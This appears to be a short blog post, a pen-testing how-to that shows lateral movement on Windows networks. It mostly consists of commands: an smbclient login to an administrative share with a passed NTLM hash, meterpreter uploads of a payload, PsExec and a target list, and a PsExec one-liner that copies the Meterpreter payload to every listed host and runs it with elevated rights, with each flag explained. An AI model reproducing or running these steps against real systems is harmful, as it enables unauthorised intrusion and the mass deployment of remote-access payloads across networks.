Showing posts with label psexec. Show all posts
Showing posts with label psexec. Show all posts

Aug 20, 2013

Howto: Dropping Shell And PSexec

smbclient //192.168.1.120/c$ -U Administrator -p 4ECC0E7568976B7EAAD3B435B51404EE:551E3B3215FFD87F5E037B3E3523D5F6
 
 
 
 
meterpreter > upload /my/local/path/to/metr.exe \\users\\MrClickHappy\\metr.exe
meterpreter > upload /my/local/path/to/PsExec.exe \\users\\MrClickHappy\\PsExec.exe
meterpreter > upload /my/local/path/to/targets.txt \\users\\MrClickHappy\\targets.txt
meterpreter > shell
Process 3052 created.
Channel 1 created.
Microsoft Windows [Version 6.1.7601]
Copyright (c) 2009 Microsoft Corporation. All rights reserved.
C:\Users\MrClickHappy> PsExec.exe @targets.txt -accepteula -c -f -h -d metr.exe

This command will use the exiting user's credentials to copy the Meterpreter payload to the remote system (-c), overwrite the file if it already exists (-f), run it with elevated permissions (-h), not wait for the process to terminate (-d), and disable the EULA prompt (-accepteula). A list of targets has been provided (@) so the command will keep running and eventually find a winner.


Source: 
http://pen-testing.sans.org/blog/pen-testing/2013/08/08/psexec-uac-bypass
https://www.christophertruncer.com/dropping-payloads-with-credentials
/http://www.ampliasecurity.com/research/wce12_uba_ampliasecurity_eng.pdf






If you like my blog, Please Donate Me
Or Click The Banner For Support Me.
 

Sponsors

lusovps.com

Blogroll

About

 Please subscribe my blog.

 Old Subscribe

Share |